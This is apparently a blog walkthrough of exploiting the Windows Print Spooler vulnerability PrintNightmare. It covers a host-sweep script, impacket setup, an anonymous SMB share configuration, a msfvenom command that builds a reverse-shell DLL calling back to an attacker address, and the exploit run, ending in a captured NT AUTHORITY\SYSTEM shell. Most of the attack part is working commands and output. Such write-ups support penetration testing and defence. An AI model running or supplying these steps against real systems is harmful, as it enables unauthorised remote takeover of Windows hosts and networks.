[CVE-2021-1675 / CVE-2021-34527] PrintNightmare

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) is a vulnerability in the Microsoft Windows Print Spooler service. An authenticated user can make the spooler load an attacker-supplied printer driver DLL, which runs as NT AUTHORITY\SYSTEM, so an attacker with any domain account can gain full control of an affected host.

Exploitation steps

Step 1: Check remotely whether the target is potentially vulnerable

➜ rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
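Seeing MS-RPRN or MS-PAR in the rpcdump output only shows that the spooler's RPC interfaces are reachable over the network; whether the host is actually exploitable depends on its patch level and Point and Print settings, which this check cannot see. As an added example (not part of the original post), the shell function below parses rpcdump.py output by interface UUID rather than by the protocol label, reports the TCP/named-pipe bindings, and returns a non-zero status when neither interface is present, so it can be dropped into a loop over many hosts. The sample output in the comment is constructed to approximate rpcdump's format; the host address is hypothetical.

```shell
#!/usr/bin/env bash
# Parse rpcdump.py output and report whether the Print Spooler RPC
# interfaces (MS-RPRN / MS-PAR) are exposed. Intended use:
#   rpcdump.py @192.168.1.10 | spooler_rpc_exposed
# Exit status 0 when at least one interface is found, 1 otherwise.
# Exposure is a precondition, not proof of vulnerability: a fully
# patched host still advertises these interfaces.
set -u

# Interface UUIDs from the MS-RPRN and MS-PAR specifications (lower-case
# so comparison is case-insensitive).
RPRN_UUID="12345678-1234-abcd-ef00-0123456789ab"
PAR_UUID="76f03f96-cdfd-44fc-a22c-64950a001209"

# Reads rpcdump output on stdin. rpcdump prints one blank-line separated
# block per interface (Protocol / Provider / UUID / Bindings), e.g.
#   Protocol: [MS-RPRN]: Print System Remote Protocol
#   Provider: spoolsv.exe
#   UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
#   Bindings:
#             ncacn_ip_tcp:192.168.1.10[49669]
#             ncalrpc:[spoolss]
# Prints "MS-RPRN <uuid> <bindings>" / "MS-PAR <uuid> <bindings>" for each
# matching block (only ncacn_ip_tcp / ncacn_np bindings are listed, since
# only those are reachable remotely).
spooler_rpc_exposed() {
    local matches
    matches=$(awk -v rprn="$RPRN_UUID" -v par="$PAR_UUID" '
        BEGIN { RS = ""; FS = "\n" }       # paragraph mode: one block per record
        {
            uuid = ""; bind = ""
            for (i = 1; i <= NF; i++) {
                line = $i
                sub(/^[[:space:]]+/, "", line)
                if (tolower(line) ~ /^uuid[[:space:]]*:/) {
                    sub(/^[^:]*:[[:space:]]*/, "", line)   # strip "UUID    : "
                    split(line, parts, " ")                # drop the " v1.0" suffix
                    uuid = tolower(parts[1])
                } else if (line ~ /^ncacn_(ip_tcp|np):/) {
                    bind = (bind == "") ? line : bind "," line
                }
            }
            if (uuid == rprn)     print "MS-RPRN", uuid, bind
            else if (uuid == par) print "MS-PAR", uuid, bind
        }')
    [ -n "$matches" ] || return 1
    printf '%s\n' "$matches"
}

# Convenience wrapper: run rpcdump.py against one host and classify it.
# Assumes rpcdump.py (impacket) is on PATH; not exercised offline.
check_host() {
    local host="$1"
    if rpcdump.py "@${host}" 2>/dev/null | spooler_rpc_exposed; then
        echo "[+] ${host}: spooler RPC interfaces exposed"
    else
        echo "[-] ${host}: no MS-RPRN/MS-PAR interface found"
    fi
}
```

Run `for h in $(cat hosts.txt); do check_host "$h"; done` to sweep a subnet; hosts flagged with `[+]` are the ones worth testing with the connection check in Step 3.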

Step 2: Set up the environment

➜ heyho python3 -m venv venv 
➜ heyho source venv/bin/activate
➜ /tmp venv:(heyho) cd /opt/windows/PrintNightmare/CVE-2021-1675/impacket
➜ impacket git:(master) venv:(heyho) pip3 install -r requirements.txt
➜ impacket git:(master) venv:(heyho) python3 setup.py install

Download the updated version of the exploit script and save it as printnightmare.py.

Step 3: Check connectivity

# Start a listener on port 445 first, then fire the exploit with a dummy UNC path
# pointing at the listener; if the target connects back, it is reaching out to fetch the driver.
➜ nc -lvnp 445

➜ CVE-2021-1675 git:(main?) venv:(heyho) python3 printnightmare.py 'lemin:bandung@10.1.2.134' PleaseBlockMe '\\10.18.200.11\test\tost'

Step 4: Configure the SMB server

The share has to be reachable without credentials, because it is the target's spooler service, not the account used in the exploit, that fetches the DLL; hence the guest settings below.

/etc/samba/smb.conf:

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/heyho/
    guest ok = yes
    read only = no
    browsable = yes
    force user = kali

Restart the SMB server:

sudo systemctl restart smbd

Reverse shell

Generate the reverse-shell DLL (LHOST is the attacker's SMB server, LPORT the port the listener below will use):

➜ heyho msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.200.11 LPORT=1338 -f dll -o shell.dll

Run the PrintNightmare exploit, pointing it at the DLL on the share from Step 4:

➜ CVE-2021-1675 git:(main?) venv:(heyho) python3 printnightmare.py 'lemin:bandung@10.1.2.134' PleaseBlockMe '\\10.18.200.11\smb\shell.dll'
➜ nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.18.200.11] from (UNKNOWN) [10.1.2.134] 50097
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

References

  • https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
  • https://github.com/cube0x0/CVE-2021-1675
  • Driver HTB by Ippsec
  • Atom HTB by Ippsec
  • https://winpoin.com/cara-cegah-bug-exploit-printnightmare-di-windows/
  • https://www.redscan.com/news/printnightmare-security-advisory/
This post is licensed under CC BY 4.0 by the author.